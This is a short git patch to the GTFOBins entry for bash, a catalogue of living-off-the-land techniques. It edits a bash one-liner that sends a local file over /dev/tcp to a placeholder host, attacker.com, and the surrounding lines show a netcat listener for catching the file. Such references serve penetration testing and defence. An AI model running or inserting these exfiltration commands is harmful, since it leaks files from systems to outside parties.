From 4b11771fec8939618870e06ebbf51880c8723ba1 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Tue, 12 Jun 2018 16:17:34 +0200 Subject: [PATCH] Avoid cat in bash --- _gtfobins/bash.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 8e842ac..0b67c26 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -12,7 +12,7 @@ functions: export RHOST=attacker.com export RPORT=12345 export LFILE=file_to_send - bash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' + bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | export RHOST=attacker.com